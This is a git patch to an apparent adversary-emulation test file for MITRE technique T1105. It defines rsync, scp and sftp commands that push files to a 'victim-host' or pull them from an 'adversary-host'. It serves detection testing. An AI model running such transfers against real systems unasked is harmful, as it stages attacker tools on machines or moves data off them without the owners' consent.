From cbb425bdc7f1ba84013f53e0e8b41a758c3e0494 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 26 Oct 2018 12:59:47 -0600 Subject: [PATCH] Fixed T1105 test --- atomics/T1105/T1105.yaml | 185 ++++++++++++++++++++++++++++++++------- 1 file changed, 155 insertions(+), 30 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 431ba313..b5f0ec68 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -3,45 +3,170 @@ attack_technique: T1105 display_name: Remote File Copy atomic_tests: -- name: rsync - scp - sftp remote file copy +- name: rsync remote file copy (push) description: | - Utilize rsync, scp and sftp to perform a remote file copy + Utilize rsync to perform a remote file copy (push) supported_platforms: - linux - macos + input_arguments: + local_path: + description: Path of folder to copy + type: Path + default: /tmp/adversary-rsync/ + username: + description: User account to authenticate on remote host + type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive rsync + type: Path + default: /tmp/victim-files executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - # Adversary System Configuration - # Ensure SSH access has been configured for an adversary account - echo "This file transferred by scp" > /tmp/adversary-scp - echo "This file transferred by sftp" > /tmp/adversary-sftp - mkdir /tmp/adversary-rsync - cd /tmp/adversary-rsync - touch a b c d e f g +- name: rsync remote file copy (pull) + description: | + Utilize rsync to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_path: + description: Path of folder to copy + type: Path + default: /tmp/adversary-rsync/ + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive rsync + type: Path + default: /tmp/victim-files + executor: + name: bash + command: | + rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - # Victim System Configuration - # Ensure SSH access has been configured for a victim account - # Ensure write access for victim account to this directory - mkdir /tmp/victim-files - cd /tmp/victim-files +- name: scp remote file copy (push) + description: | + Utilize scp to perform a remote file copy (push) + supported_platforms: + - linux + - macos + input_arguments: + local_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-scp + username: + description: User account to authenticate on remote host + type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive scp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + scp #{local_file} #{username}@#{remote_host}:#{remote_path} - # Push files to victim using rsync - rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ +- name: scp remote file copy (pull) + description: | + Utilize scp to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-scp + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive scp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + scp #{username}@#{remote_host}:#{remote_file} #{local_path} - # Pull files from adversary using rsync - rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ +- name: sftp remote file copy (push) + description: | + Utilize sftp to perform a remote file copy (push) + supported_platforms: + - linux + - macos + input_arguments: + local_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-sftp + username: + description: User account to authenticate on remote host + type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive sftp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' - # Push files to victim using scp - scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ - - # Pull file from adversary using scp - scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file - - # Push files to victim using sftp - sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' - - # Pull file from adversary using sftp - sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file +- name: sftp remote file copy (pull) + description: | + Utilize sftp to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-sftp + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive sftp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + sftp #{username}@#{remote_host}:#{remote_file} #{local_path}